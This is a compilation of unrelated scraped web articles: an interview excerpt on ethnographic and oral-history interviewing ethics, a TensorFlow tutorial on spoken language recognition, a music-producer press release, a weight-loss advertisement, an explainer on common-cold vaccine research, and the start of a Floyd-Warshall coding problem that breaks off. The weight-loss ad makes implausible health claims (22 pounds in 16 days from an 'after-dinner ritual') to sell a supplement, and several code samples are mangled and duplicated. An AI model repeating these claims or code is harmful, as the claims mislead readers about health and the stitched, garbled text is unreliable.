Having said that, my impression, based on personal observation, is that there is a strong resonance between the types of interviews employed, meaning that both ethnographers and historians are quite comfortable with semi-directional interviews and are on the lookout for stories, rather than the “data” that a heavily structured interview might yield. Although, it is possible to say that the ethnographic approach is more eager to pick up on the tangents, the esoterica, and the deeply local ways of doing things that often surface in interviews. I mean, the interviewee recalls something quite intriguing, and while that is off the point of the ethnographer’s main interview topic, you pick up that nugget or thread and you follow it where it leads, to the extent possible.
It may be obvious, but I would also point out that ethnography is a multimodal documentary practice. While ethnographers are also invested in the efficacy and importance of eliciting memories and historical and cultural reflections by verbal communication and oral narrative–the interview format–we have other tools in our toolkit to draw upon in the technical realm, such as photography, drawings, mapping, and field notes.
MS: So, in this broader sense of observing and talking to people about a wide range of their experiences and expressions, I wonder if you could speak about the changes that can occur when bringing recording equipment into the research and interview setting–whether we are talking about a camera or an audio recorder, or an oral history or ethnographic interview. I often talk to students about how that can change the dynamics of the interview, and I’m sure you have thoughts on that.
GS: Sure. You introduce recording equipment and people shut up. Or, you introduce the equipment and you might as well have placed, you know, a cup of water on the table, because people don’t care. In all those situations, however, the thing that may present itself as an obstacle only becomes that if you present it as an obstacle; if you make more of it than it actually is…like, if you infuse the recorder with some sort of manna that it doesn’t have. I use recorders and cameras as instruments, tools, and my approach is not to hide them or minimize them; rather I point them out and say: We want to make sure we get a really good, clean recording (or a good image) and this is what we use to ensure that outcome. Today, there’s nobody anywhere anymore who is surprised by recording equipment. I have had situations where I pulled out all this bulky gear and they go, oh, my niece interviewed me the other day for a school project and she had this cute little phone–you don’t have one of those? Oh, geez! So, that’s something [the ubiquity of digital recording devices] that has certainly changed people’s perceptions of recording equipment.
As for the very act of documentation, people certainly see interviews on TV, and they have been explicit in stating some variation on the theme of don’t do to me what they do on TV, by which they mean edit the interview to make them look stupid or show them up. This was especially the case in Trinidad, where people were very sensitive to this issue of misrepresentation due to a general mistrust of negative, media portrayals from the past. And this suspicion was apparent enough that we needed to let them know that we, the camera crew, were not journalists there to do some kind of investigative hit-piece, because they knew full-well they didn’t want to be a part of that sort of thing. So, we had to tell them more than once that the project [to document Indo-Muslim public performances] was different, that it was for scholarly purposes, and so on. The privilege of working at the Library, or any cultural institution, is that I can say, what we really want to do is make sure that we add your voice to the public record, and I want to make sure that I get the best recording possible. And that’s what Bob McCarl calls “documentation in full view of the community.” Alternatively, I like to say that we’re not documenting from behind a duck blind; meaning, we’re conscious of and conscientious about letting people know what the recording is for and why we’re there. Every interview is situational, so there are no direct guidelines that have worked for me other than being open about it, because 95 percent of the time, the interviews worked fine, and the five to ten percent of the time when they don’t, I take it as my fault.
MS: So, we are getting into ethics, and I’m thinking about documentation and editing. I always wish, in an ideal world, that the person I interviewed will be in the editing suite with me, telling me where to make cuts and what they would like the finished product to say, but that is often too difficult, logistically speaking. How do you feel about the post-interview interpretation that can take place when making a short film, or whatever else–you know, the editing, interpretation, the cutting and pasting of things that didn’t happen that way in real time?
GS: Again, it’s about how transparent you are about what you’ve done, letting people know at the very beginning what’s going to happen. Most often, people are interested in making sure that you’re going to give them a fair representation. That fair representation is not something that is guaranteed in advance by you, but the more time that I’ve spent in the field with people, the more confident they are that I will represent them not just accurately, but that I will be true about the things they share. Yet, I’ve had people who say reflexively, Well, you’re gonna get a different story from somebody else, so don’t take my word for it. So, they have a sense that if I’m going to do a documentary, all those different voices will be included…and they can then decide if they’re comfortable with having all those different voices included. And, yes, you’re absolutely right this notion of “co-voicing” and collaborative editing should be the norm, but practical issues can make that too difficult.
CRHP provides a great example of where it works for us on a small scale, where all interviews we put online are full, unexpurgated interviews–although, I make a few cuts here and there to stitch together digital segments, and I have occasionally bleeped out the excessive number of “f-bombs”…you know, one or two is fine, but 25? Not so good, because the teachers [using the videos for educational purposes] would all complain! After that, what we do is return the transcript and DVD and let the interviewee know: This is what’s going out online; is there anything you want to take out, redact? Is there anything that you didn’t want to say or be made public?
During CRHP, there was an instance when we were interviewing an African American family down South. And they told us a story from the 1960s about their involvement in civil defense actions and, as many people do in the South–black and white, many different ages–if you’re old enough to shoot for food, you carry guns around, and you carry them for self-defense, as well. It’s the opposite of the KKK’s purpose of going out to kill black folk. So, this family had guns in their car, and they were being chased by police…they had to flee an event…it was a very exciting story, with different people chiming in about how they had to evade the police, because they would get all the heat for possessing firearms, whereas white folks would not. Some time after the interview, I produced what I thought was the final cut and sent it back to them with the transcript. We then got a call from our colleagues at the NMAAHC, who said that the family was very concerned about that story. They didn’t want it going online, because there might be repercussions. My first thought was, that was 60 years ago, what repercussions could there possibly be? It was a head-scratching moment, but about three weeks later, I heard that their house had been fire bombed, because white racists knew that they were being interviewed about their civil rights activism and still resented them for it. The lesson is that the consequences that people are going to take on [because of an interview] are not going to be yours since you are removed from the community, but you have to try and be aware of them and respond appropriately. So, the notion of editing, redacting, being aware of the community’s sensibilities and trials — that’s important. And you’re not going to know that without somebody guiding you through those nuances, right?
MS: Yes. Let’s continue with CRHP. I can imagine that highly sensitive, challenging, and emotional stories and experiences were often shared with you. What’s your approach to handling what are sometimes called “difficult histories,” even if that’s too light a term for some of the horrific experiences of racism and dehumanization during the fight for Civil Rights?
GS: We tend to think of “difficult histories” as coming up on issues of profound moral or political problems, such as Black Lives Matter or the Me Too Movement. But, we often don’t know what the hard histories are until we get into the middle of them. We don’t know what questions are going to trigger the hard-hitting emotions, and so the hard history is revealed right there on the spot, you know? However, that’s a reason to do this work, since we are learning all the time. It’s about the stories that people are willing to tell you, and remaining open to all of that. The only thing that I do, really, is to be as open as possible. We are not neutral recording machines; we are not the camera. The camera is recording something that we’re experiencing. We are seeing through it, so we are a mediating point, and we are giving voice to those difficult histories. Understanding that everything is situational, you listen. That’s what you do. It’s amazing…one of the sobering things that I learned through the CRHP is that PTSD is not only a condition resulting from having been in a war in some foreign corner of the world. Being on the front lines of the freedom struggle in the South was like being in a war: The trauma individuals suffered from seeing and hearing about colleagues and friends being brutalized and killed was intense and long-lasting. When you hear strong, older women with immense dignity and courage tell you that they started watching a documentary on the Civil Rights Movement and had to turn it off and go to bed, and then stayed in bed for three days because of all the trauma it brought up–after 50 years had elapsed? I mean, that’s serious!
I think it comes back to ethics. When doing the interview, or engaging the ethnographic process, there’s the golden rule to do no harm. So, in the course of an interview, you may want to ask yourself this question, Does this person really want to share this story in this particular way? And one practical consideration is to say, Can we just stop for a second? We are getting into deeply personal subjects here, maybe we can come back to this a little later. You’re giving people the chance to reflect upon whether they really want to be saying these things, because if not, then you may have to redact the story, or edit it out later, which can be challenging. But that’s part of the ethical responsibility you have: Listening to stories of trauma, or situations that are just fraught. But you don’t know in advance what’s fraught, so you have to be open to it.
I find this with students, who can get overwhelmed when someone’s sharing a deeply personal story. You need to ask, How did that person deliver or say that story? You need to read the situation, read the context. And by no means publish the story until you have a chance to tell that person what the story contains. This is just standard practice; it’s for the protection of the individual giving the story, and for the student. As an instructor, you don’t want the student to wander into trouble…and also what this might do to subsequent relationships between that person and the community, and researchers who might come after you to work in that same community. So, the idea of teaching difficult histories is about the idea of listening to them. It passes through you as the first person hearing them, and then you have to try and put that out to the public in a way that is respectful and illuminates and expands upon our historical memory.
MS: Since you’ve brought up teaching, let’s shift the conversation to the AFC and its educational mission to train people in ethnographic methods and cultural documentation.
GS: The longer story is that it’s written in the DNA of the Center’s mission, which is to provide opportunities for the expression of folklife, cultural traditions, and to provide opportunities for folklorists and others to document, present, and represent their communities. So, documentation has always been a part of it. For instance, the field surveys [mentioned earlier] go back to the early days of AFC documenting, in an interdisciplinary fashion, cultural traditions from around the world. And it’s one of the seminal efforts of the Center: To train people in ethnographic documentation methods and also sustain that cultural record by providing descriptions, a template for people who are not well-versed in librarianship principles and archiving, to enter into that field with some degree of confidence, and to train people to do that. So, Carl Fleischauer, Elena Bradunas, Peter Bartis, and others, set that standard over 40 years ago.
I think the concept of [AFC] field schools was raised during an early, 1980s AFC Board meeting, when the question Would the Center undertake training in documentation? was posed. It was felt at the university level that folklorists were going out in the field with no training, formal or otherwise, in field documentation. Thanks to David Taylor’s work as the main organizer of the field schools, they started out as partnerships between the AFC and an institution of higher learning, and remain so for the most part today. So, the first few years it was Indiana University for two field schools…our colleague Howard Sachs at Kenyon College in Gambier, Ohio, did one field school…and Mario Montaño did field schools at the University of Colorado and University of New Mexico over the course of two summers. Many others have participated since then including the latest one in 2018 with the University of Wyoming and Utah State University. They not only trained students, but also academy-based folklorists themselves, in field methodologies in an experiential setting. I should add that about ten years ago we used the field school model to provide documentary training to Indigenous people, the Laikipia Maasai of Kenya and Rastafari and Maroon communities in Jamaica, in partnership with the World Intellectual Property Organization (WIPO). And presently, the AFC provides skills-based methods training for North American Indigenous community scholars through collaborations with the Sustainable Heritage Network, out of Washington State University.
MS: If I may interrupt–for those who may not know, what is a field school?
GS: Well, the [AFC] field school in cultural documentation is about teaching a comprehensive set of [ethnographic] methods including technical training in various aspects of field documentation. Let me put it this way: Basically, the field school is an intensive ethnographic boot camp for three weeks. Classroom instruction is for about two weeks, which entails hands-on instruction where we take students out for two, four, six hours a day, teaching them how to turn the recorder on and off, manipulate the controls and so on. Quite literally, we shove the tape recorder into their hands and say Here’s your field kit, here’s what you’ve got in here, now I want you to do a five-minute interview and tell me all that you did and didn’t do, and then we’ll listen to it. So, from the very beginning there’s this notion of pushing people into the deep end, having them learn things they didn’t know, and unlearn things they thought they knew in terms of technical set-up. So, you have people teaching audio recording techniques using, as you are, a digital recorder…back in the day, it was a cassette recorder and before that…not quite a hand-crank Victrola, which is the gesture you are making with your hands right now [laughter]…but all of that combined with, say, photography. (As an aside: when I began teaching in the field schools in 2004, we were still doing photography with single-lens reflex, analog cameras…we still have a bunch of them sitting up in the stacks somewhere, which all went away almost as soon as the digital age hit.)
And during the field school, you’re taking them through the process of a fieldwork project, which has been determined by the instructor at the university and the AFC. So, when we worked with researchers at Utah State University (USU), we [AFC] say [to the instructor], How does this help you with your research on refugee communities in Cache Valley, Utah? This is because the university researcher/instructor has already built rapport and trust with community members who will be interviewed by students during the field school. So, instructors Randy Williams and Lisa Gabbert worked with folklorist Nelda Ault to get together members of three distinct resettled, refugee communities and to bring them into the school environment. The instructors’ goal was to also demystify the school itself and try to get the children of refugees to start thinking of USU as a place where they are welcome. And one way to do that was to involve the communities in the documentation efforts and to say to them, Now that you’re here in Utah, what are some of the things that you would like to document about your community’s traditions?
Going back to an earlier concept you brought up, how involved is the community in shaping their own representation? That’s a big part of these field school projects. We rely on these community members to be our interlocutors, guiding us through their cultural concepts and how they represent themselves as cultural beings in this new setting [e.g., Utah]. And, in an ideal sense, the things you look for when putting together a field school is, first and foremost, buy-in from the community. Who is going to be doing the work on the ground? The students and the instructors. And then we [AFC] come in (after already working with the instructors to shape the field school program) to teach alongside the university instructors.
MS: So, getting a little narrower in focus, what are the key elements, or ingredients, in teaching the art of the interview to field school participants?
GS: There is a list of 24 tips for doing a guided interview that we give to the students. They’re tips and guidelines, not that you need to do them in order, but they need to be taken into account as a whole. For instance, what you just did: “stamping” that it’s March 26 on the recording…
MS: And I’ll ask for your consent at the end!
GS: That’s right, because you didn’t ask for my consent at the beginning [which is recommended].*
|
https://medium.com/communityworksjournal/its-about-the-stories-that-people-are-willing-to-tell-you-an-interview-with-guha-shankar-56f0ac09a216
|
['Joe Brooks']
|
2019-11-03 20:44:04.700000+00:00
|
['Teaching', 'History', 'Community Engagement', 'Learning', 'Education']
|
Spoken Language Recognition Using Convolutional Neural Networks
|
Spoken Language Recognition Using Convolutional Neural Networks
Automatically identify the spoken language from a speech audio signal with TensorFlow
Photo by Su San Lee on Unsplash
Introduction
Applications
At Fraunhofer IAIS, we work on various speech technologies such as automatic speech recognition, speaker recognition, etc. In recent work, I developed a new service predicting the spoken language directly from the audio stream. If the language is known, a suitable model for the speech recognition step can be selected automatically. Potential applications for this can be automatic transcription software and conversational AI.
Open-Source Code
I have prepared a GitHub repository including Jupyter Notebooks that can be used to experiment and train an own spoken language recognizer. In the current state, it is capable of distinguishing between German and English. You can see this as a starting point to implement your own language recognizer. We are mainly using Python 3, TensorFlow 2, and librosa.
Approach
The concept is based on publications by Bartz et. al [1] and Sarthak et. al [2], who are utilizing convolutional neural networks (CNN) to implement spoken language identification systems. The idea is to analyze the spectrogram of a short audio segment containing a speech signal with a huge CNN for classification. We are using the Mel-scaled spectrogram similar to Pröve [4].
Results
The open-source variant of my language recognition based on Common Voice data yields an accuracy of 93.8 % classifying English and German. At our institute, we are using our own media datasets and obtain an overall accuracy of 98.2 % with the same code tested on 152 h of augmented testing data. Our algorithm can distinguish between English, German, and “other” (unknown class).
Dataset
The dataset used in the notebooks is based on Mozilla’s Common Voice. You will need to download the English and the German datasets and then run the scripts from the first notebook to extract a training and an evaluation dataset containing speech signals with a duration between 7.5 and 10 seconds.
Data Augmentation
The training dataset can be augmented by adding noise. This will later help to improve the robustness of the final model against noise affected recordings. We use the Numpy function random.normal for a normal (Gaussian) distribution, which gives us white noise.
def add_noise(audio_segment, gain):
num_samples = audio_segment.shape[0]
noise = gain *
return audio_segment + noise add_noise(audio_segment, gain):num_samples = audio_segment.shape[0]noise = gain * numpy.random.normal (size=num_samples)audio_segment + noise
Data Preprocessing
All audio files are preprocessed to extract a Mel-scaled spectrogram. This is done with the following steps.
Fig 1: Data preprocessing from speech audio to the spectrogram | Image by author
Loading the Audio File
In this step, the audio is loaded and downsampled to 8 kHz to limit the bandwidth to 4 kHz. This helps to make the algorithm robust against noise in the higher frequencies. As stated in [1], most of the phonemes in the English language do not exceed 3 kHz.
Fixing the Duration to 10 Seconds
def fix_audio_segment_to_10_seconds(audio_segment):
target_len = 10 * sample_rate
audio_segment = numpy.concatenate([audio_segment]*2, axis=0)
audio_segment = audio_segment[0:target_len]
return audio_segment
We duplicate the signal that is between 7.5 and 10 seconds long and cut it to 10 seconds.
Mel-scaled Spectrogram
The Mel-scaled spectrogram is computed from the audio. It helps analyzing the speech frequencies with the neural network. The Mel-scaling represents lower frequencies with a higher resolution than higher frequencies and takes into account the way humans perceive frequencies.
def spectrogram(audio_segment):
# Compute Mel-scaled spectrogram image
hl = audio_segment.shape[0] // image_width
spec =
n_mels=image_height,
hop_length=int(hl))
# Logarithmic amplitudes
image =
# Convert to numpy matrix
image_np = numpy.asmatrix(image)
# Normalize and scale
image_np_scaled_temp = (image_np - numpy.min(image_np))
image_np_scaled = image_np_scaled_temp /
numpy.max(image_np_scaled_temp)
return image_np_scaled[:, 0:image_width] spectrogram(audio_segment):# Compute Mel-scaled spectrogram imagehl = audio_segment.shape[0] // image_widthspec = librosa.feature.melspectrogram (audio_segment,n_mels=image_height,hop_length=int(hl))# Logarithmic amplitudesimage = librosa.core.power_to_db (spec)# Convert to numpy matriximage_np = numpy.asmatrix(image)# Normalize and scaleimage_np_scaled_temp = (image_np - numpy.min(image_np))image_np_scaled = image_np_scaled_temp /numpy.max(image_np_scaled_temp)image_np_scaled[:, 0:image_width]
Normalization takes place to adjust the values in the spectrogram between 0 and 1. This step equalizes quiet and loud recordings to a common level.
Conversion to PNG
All files are finally stored as PNG files of size 500 x 128, but first, the normalized spectrograms need to be converted from decimal values between 0 and 1 to integer values between 0 and 255.
def to_integer(image_float):
# range (0,1) -> (0,255)
image_float_255 = image_float * 255.0
# Convert to uint8 in range [0:255]
image_int = image_float_255.astype(numpy.uint8)
return image_int
Fig 2: A Mel-scaled spectrogram of speech | Image by the author
Model Training
Accessing the Datasets
To make the datasets accessible for the model training algorithm, we first need to instantiate generators that iterate the datasets in a memory efficient way. This is important because we have 60,000 images for both training and evaluation data and we cannot just load it into memory. Fortunately, Keras, which is part of TensorFlow, has amazing functions to deal with image datasets. I am using the ImageDataGenerator as a data input source for the model training.
image_data_generator = ImageDataGenerator(
rescale=1./255,
validation_split=validation_split) train_generator = image_data_generator.flow_from_directory(
train_path,
batch_size=batch_size,
class_mode='categorical',
target_size=(image_height, image_width),
color_mode='grayscale',
subset='training') validation_generator = image_data_generator.flow_from_directory(
train_path,
batch_size=batch_size,
class_mode='categorical',
target_size=(image_height, image_width),
color_mode='grayscale',
subset='validation')
A suitable batch-size is 128, which is big enough to help reducing over-fitting and keeps the model training efficient.
Model Definition Inception V3
As suggested in [1], a huge CNN such as Inception V3 is recommended to solve this task. Spoken language recognition is a very complex task that demands a model with a big capacity. Smaller networks perform worse because they are not capable of handling the complexity of the data.
The original Inception V3 model [3], which is already available from Keras Applications, must be slightly adapted to process our dataset. It is expected to process images with 3 different color layers, but our images are grayscale. The following lines of code copy the single image color layer to all three channels for the input tensor for Inception V3.
The model has nearly 22 mio parameters.
Compiling the Model
In my evaluations, the RMS-Prop optimizer yielded good results. Adam is suggested in [1].
Early Stopping
Training can be speeded up by automatically stopping when the learning finishes. I use Keras’ EarlyStopping method to do so.
Learning Rate Decay
As suggested in [1], I implemented an exponential learning rate decay.
def step_decay(epoch, lr):
drop = 0.94
epochs_drop = 2.0
lrate = lr * math.pow(drop, math.floor((1+epoch)/epochs_drop))
return lrate
learning_rate_decay = step_decay(epoch, lr):drop = 0.94epochs_drop = 2.0lrate = lr * math.pow(drop, math.floor((1+epoch)/epochs_drop))lratelearning_rate_decay = LearningRateScheduler (step_decay, verbose=1)
Training
Now, the actual training takes place using the following command.
model.fit(train_generator,
validation_data=validation_generator,
epochs=60,
steps_per_epoch=steps_per_epoch,
validation_steps=validation_steps,
callbacks=[early_stopping, learning_rate_decay])
The number of epochs is very high, but since I am using early stopping, fortunately, the algorithm stops after 36 epochs.
Fig 3: Training and evaluation accuracies | Image by the author
When looking at the training and evaluation accuracies for the 36 epochs, we can see that there is overfitting involved, which means that the model is much more accurate in classifying the training dataset than the evaluation dataset. This is due to the fact that the Inception V3 model is huge and has an enormous capacity. Using such a big network means that the amount of diverse training data should be very large, as well. So, to overcome this issue, you can increase the amount of training data up to the point where overfitting does not occur any more. In the plot, you can also see the effect of the learning rate decay. The steepest learning curve can be seen for the first 10 epochs.
Evaluation
Finally, I instantiate a new ImageDataGenerator for the testing data and use
_, test_accuracy = model.evaluate(evaluation_generator,
steps=evaluation_steps)
to evaluate the model. The result is a testing accuracy of 93.8 %.
Adapting and Improving the Model
Feel free to use the code to improve the model. For example, you can add more classes and feed it with more data from other languages. Also, it is recommended to adapt the data and the augmentation to your application. We at Fraunhofer have an optimized version trained on media data. We are using two additional augmentation steps to improve results on double-talk (overdub) and background music. You can also alter pitch and speed to perform data augmentation. Moreover, it is recommended to use much more data. If the amount and diversity of the training dataset is not sufficient, overfitting might occur.
Summary
I have introduced my open-source code on GitHub and the implemented approach for identifying the spoken language directly from speech audio. The model accuracy is 93.8 % for the given datasets based on Common Voice. The idea is to analyze the Mel-scaled spectrogram of a 10 seconds long audio segment using a CNN with a high capacity. Since language recognition is a complex task, the network needs to be large enough to capture the complexity and derive meaningful features during training. I suggest to further improve the model by extending the dataset and the augmentation techniques. Then, testing accuracies above 98 % are possible without changing the training implementation itself.
References
[1] C. Bartz, T. Herold,H. Yang and C. Meinel, Language Identification Using Deep Convolutional Recurrent Neural Networks (2015), Proc. of International Conference on Neural Information Processing (ICONIP)
[2] S. S. Sarthak, G. Mittal, Spoken Language Identification using ConvNets (2019), Ambient Intelligence, vol. 11912, Springer Nature 2019, p. 252
[3] C. Szegedy, V. Vanhoucke, S. Ioffe, J. Shlens and Z. Wojna, Rethinking the Inception Architecture for Computer Vision (2015), CoRR, abs/1512.00567
[4] P.-L. Pröve, Spoken Language Recognition (2017), GitHub Repository
|
https://medium.com/towards-artificial-intelligence/spoken-language-recognition-using-convolutional-neural-networks-6aec5963eb18
|
['Joscha Simon Rieber']
|
2020-12-17 01:02:16.554000+00:00
|
['Deep Learning', 'Language', 'Speech', 'Audio', 'NLP']
|
French EDM Music Producer Damien Ranners Eyeing U.S. Artist Collaborations
|
Paris, France
Currently based in Paris France, Parisian Music Producer Damien Ranners is taking his talents to the U.S. Market as a collaborator with talented U.S. based singers who like him are mostly inspired by EDM.
Ranners describes his signature producing style as progressive melodic house, with a pinch of Trap, and a wide background of electro R&B and hip-hop as well.
In the early 2000’s Ranners was active as a musician on the French hip-hop R&B and reggaeton scene working with French producers and UK artists like Karl Williams, Suzanne Thomas, also Mariano, Berny Craze, Menelik and more. Also talented in TV production, his voice and music design is well known in advertising circles.
“French EDM Music Producer Damien Ranners is creative, comical crazy cool and his beats are fire.” Faith Willows, Miami Patch National Freelance Arts & Entertainment Writer.
Ranners is searching for talented EMD artists in the U.S. who want to collaborate and take their careers to the next level. Check out his latest videos to get a snapshot into his musical world, and get a feel for his style.
To learn more about Damien Ranners visit his website or connect with him on social media @damienranners.
|
https://medium.com/@shegotgamemedia/french-edm-music-producer-damien-ranners-eyeing-u-s-artist-collaborations-d6840438eeeb
|
['She Got Game']
|
2020-12-21 18:23:56.516000+00:00
|
['Collaboration', 'EDM', 'French', 'Producer', 'Paris']
|
RESURGE
|
Weight Loss Tip From 48 Year Old Mom Who Lost 60 Pounds in 5 Months
Losing weight can take a lot of time, discipline and sometimes a lot of sweat.
There are however a lot of simpler ways to see your pounds and inches drop on the scale and in your waist without having to do HITT workouts three times a week, counting calories, or restricting yourself to a water-only diet.
So, if you don’t want to feel like your world’s falling apart just to lose weight, here are 12 little tricks that you should incorporate daily into your routine that will help you lose weight.
If you’re consistent enough, it can even lead you to losing up to 20 pounds in a matter of 2 weeks, just like it did for my 48 year old friend, Margaret. She safely lost 60 pounds in 5 months and shared her top 12 weight loss tips.
And the best part of all this is — there is no gym or diet required.
Click here to see the 2-minute “after-dinner ritual” that helped me melt away 22 pounds in just 16 days.
Let’s get started.
1. Always start a meal with a glass of water
2. Make a few simple swaps at every meal
3. Have a piece of dark chocolate for dessert
4. Be diligent with portion control
5. Move more
6. Don’t drink your calories
7. Don’t starve yourself
8. Snack on high-protein, high-fiber foods
9. Steer clear of simple carbohydrates
10. Eat a light, early dinner
11. Get longer, more consistent sleep
12. Keep a journa
GET RESURGE DEEP SLEEP AND HGH SUPPORT FORMULA NOW
One last thing… you should try this 2-minute “after-dinner ritual” that burns up to 2 pounds of belly fat per day…
“All this by a 2-minute “after-dinner ritual?” I asked.
I met an old friend for lunch last month and I was super impressed with how good she looked.
She said, “It’s not so much about the “after-dinner ritual”, but more about how it gives you a regenerative form of deep sleep that is responsible for everything we need to dramatically increase our fat burning metabolism and improve our health and appearance.”
Even though I was skeptical, I’ve been struggling with my weight over the last few years, so I gave it a shot and watched the same video she did.
Well, it’s only a couple weeks later and you know what they say about how “you can’t transform your body overnight”…
They’re right — it actually took me 16 days to lose 22 pounds.
Now it’s my girlfriends asking ME what I’M doing differently 💅
Imagine your body being beach ready before Memorial Day.
Imagine enjoying the foods you love: pasta, wine, or even a dessert — completely guilt-free.
And imagine feeling good and living your life without obsessing about every single calorie you eat…
All while knowing your health is being protected by one of the most powerful natural healing rituals ever discovered.
Click here to see the 2-minute “after-dinner ritual” that helped me melt away 22 pounds in just 16 days.
|
https://medium.com/@weightlosswithmenow/resurge-62f3e8dd7be0
|
[]
|
2020-11-16 15:45:03.170000+00:00
|
['Weight Loss', 'Weightloss Foods', 'Weightloss Recipe', 'Weight Loss Tips']
|
Common Cold. We’ve been catching it since time…
|
Common Cold
Have you ever had a cold? I certainly have. In fact, I have one right now, even though you (obviously) can’t tell.
I’ve had the common cold a lot: I have what seems like a particularly gullible respiratory system, and my immunity system is in turns both lacking and strangely overprotective. I have it so much, my mother likes to joke that I get it only twice a year, but that it stays for six months each time.
So I think I’m somewhat qualified to say that common cold and I have a special relationship. I even kind of like it — at least compared to some of the other stuff I’ve had over the years like viral flus, pneumonia, and chicken pox.
The common cold is almost a reliable old friend at this point.
But it really shouldn’t be.
When you read my last statement, you probably didn’t even blink. (I mean, you probably did blink, but I’m speaking metaphorically, here.) And why should you?
Plenty of people get colds, and plenty of people get colds all the time. There’s nothing unusual about me.
But what is unusual is the fact that I’m not unusual. If you think about it, think about how far human science and medicine have come in the last half-century, the fact that I catch colds all the time should be unusual.
We have vaccines for chicken pox, tetanus, rabies, and perhaps most successfully, polio. Even the flu, which shifts and mutates as often as once a year — most notably in 2009, when we saw the first cases of H1N1 flu— has a vaccine.
So, I ask the question again: why am I still catching a cold twice a year?
Perhaps the most misleading thing about the common cold is its name. The word ‘common’ implies something lowly, but, more importantly, it also implies something singular.
It couldn’t be more wrong.
The ‘common cold’ is really not common at all. Chances are, each cold I catch is entirely different from the ones I’ve caught before.
Colds are caused by any one of over two hundred viruses, belonging to one of seven families. The one thing that all these viruses have in common is the way they make you feel: the sore throat, the runny nose, the dull headache. That is to say, their common function is to attack cells in you respiratory, breathing, system.
The actual ways in which they go about doing this are all very different, so discovering one universal cure becomes much harder, if not impossible.
People have been trying to cure the cold for a long time.
The first attempt was in 1953, by an epidemiologist named Winston Prince. His interest was piqued when a handful of the nurses who worked with him all fell sick at the same time. He took samples from them and grew the culture in his lab, narrowing down to a virus known as a ‘rhinovirus’.
(The word ‘rhino’ is Latin for ‘nose’, and the reason you’re thinking of a thick-skinned grassland beast instead is that its full name, rhinoceros, refers to the ‘ceros’ or horn on its nose).
Winston Prince developed a vaccine for this virus, based on the principle that the body will create antibodies for any virus — dead or alive — that it encounters. He injected several hundred people with dead rhinovirus, then found that, on following up, they had significantly fewer colds than the rest of the population. He wrote a paper in 1957 describing his success, and in it, he named the strain ‘JH’ after Johns Hopkins — the university where he was working at the time.
Before long, however, other clinical trials came out. These new trials showed that the vaccine had little to no effect, suggesting there might be other strains around.
There were.
Over the course of the ’60s and ’70s, scientists steadily discovered more and more viruses. They found more families, apart from the rhinovirus— coronavirus, influenza and parainfluenza virus, adenovirus, respiratory syncytial virus, and metapneumovirus.
They found that, even within the rhinovirus, there were more than 160 separate strains, each needing a different vaccine. Injecting people with 160 different vaccinations each was always going to be impractical.
Scientists gave up on trying to cure the common cold. The last clinical trial was in 1975.
While rhinoviruses are different from one another, they’re also not. They all look like pom-poms under a microscope; They’re all, as Nobel Prize-winning biologist Peter Medawar called them, “a piece of bad news wrapped in a protein coat”.
And it is the coat — the protein — that makes all the difference. Each strain has a slightly different composition of the proteins that make up its exterior, so the body and white blood cells don’t recognise a new one until it’s too late.
But, some scientists asked, just because the coats are a little different, does that mean that they are nothing alike?
That’s exactly the question Sebastian Johnston was asking when he took a second look at the rhinovirus. While an asthma specialist by trade, he did some work in the “Common Cold Unit” at Imperial College in London during his PhD years and was fascinated by the cold.
Johnson wondered if he might be able to isolate some structure that was common to all strains of rhinovirus, and then develop a vaccine based on that. It wasn’t an entirely novel idea: something similar had been done with the polio vaccine as well.
He approached Jeffrey Almond, newly-appointed head of vaccine development at the giant pharma company Sanofi Pasteur. Almond was interested, and the vaccine was further looked into. The team had some success with isolating a protein that was ‘on’ many of the serotypes (strains) of rhinovirus.
However, a series of unfortunate events led to the testing grinding to a halt in 2013. There was a change in management at the company, and Almond retired. Johnston’s vaccine had nowhere to go: Imperial College couldn’t itself fund the research.
But the moral of Johnston story is this: maybe there is hope. Maybe, just maybe, we may still be able to create a vaccine for the common cold. And maybe, just maybe, I can catch it just once a year instead of twice.
Other research has been done in recent years. Prominently, Martin Moore in Atlanta is revisiting the supposed impracticality of 160 vaccines; he thinks he might be able to combine them into a cocktail of sorts.
But we also have to think about the practicality of having a cold vaccine at all. To start with, big pharma companies, don’t like vaccines in general: they take years to develop, have to be sold for less, and more often than not, don’t even end up working.
In this case, it’s not clear whether anyone would use the vaccine, even if it came on the market. Most people who could afford the vaccine would generally be pretty healthy too. They’d get over the cold in the span of a few days, so why bother preventing it?
As for those who can’t afford the vaccine, they likely have bigger things to worry about. And by the time anyone, rich or poor, takes themselves to a doctor, it’s too late for the vaccine anyway. So that rules out most of the potential buyers.
Of course, it still leaves me.
Want to write with us? To diversify our content, we’re looking out for new authors to write at Snipette. That means you! Aspiring writers: we’ll help you shape your piece. Established writers: Click here to get started.
|
https://medium.com/snipette/comon-cold-502ee8159675
|
['Manasa Kashi']
|
2019-02-22 07:01:02.159000+00:00
|
['Health', 'Vaccines', 'History', 'Virus', 'Medicine']
|
Life in the Lockdown
|
How are you doing ?
What’s life been like amidst the lockdown ? Varied experiences for people basis their own circumstances have led to a vastly different outcomes. What has each one of us learnt from the predicaments that life has thrown at us ?
The lockdown to some has been of immense learning and self-discovery. There have been bakers, chefs, artists — all of these skillsets having lain dormant throughout for so long finally found an outburst with wonderful results. At the same time life hasn’t been so kind to everybody — jobs and livelihoods lost on the financial front; but more so are the innumerous lives that have been taken from us.
Have you wondered — apart from all of these statistics on deaths and positive cases; what is life like to be someone else ? Have you put yourself into another’s shoes to look at life from their eyes — their hopes and dreams and all of their memories. Life in its transience moves on — people forget; but to the ones that you mean the world to — life stands still. Can we as a species imagine the collective grief that we are going through right now ? We all seem preoccupied in bringing our lives to a semblance of normalcy — that this might often be skipped amidst the priorities that our work might impose on us. But what is more important — what could be more important than knowing our own friends and neighbors.
Do we really know them ? Can we unmask the social façade that our lives are built on ? And truly ask — How are you doing ? Would they answer ? With those questions — I’ll leave you to ponder this coming week. Think over it and truly ponder in moments of solitude — your own well-being; both physical and mental.
|
https://medium.com/@krusna/life-in-the-lockdown-7be75f71dbbd
|
['Navaneethkrishnan Nambiar']
|
2020-12-06 20:14:34.125000+00:00
|
['Questions', 'Social', 'Wellness', 'Life', 'Lockdown']
|
The Floyd Warshall Algorithm
|
The problem is to find the shortest distances between every pair of vertices in a given edge-weighted directed Graph. The Graph is represented as Adjacency Matrix, and the Matrix denotes the weight of the edges (if it exists) else INF (1e7).
Input:
The first line of input contains an integer T denoting the no of test cases. Then T test cases follow. The first line of each test case contains an integer V denoting the size of the adjacency matrix. The next V lines contain V space-separated values of the matrix (graph). All input will be an integer type.
Output:
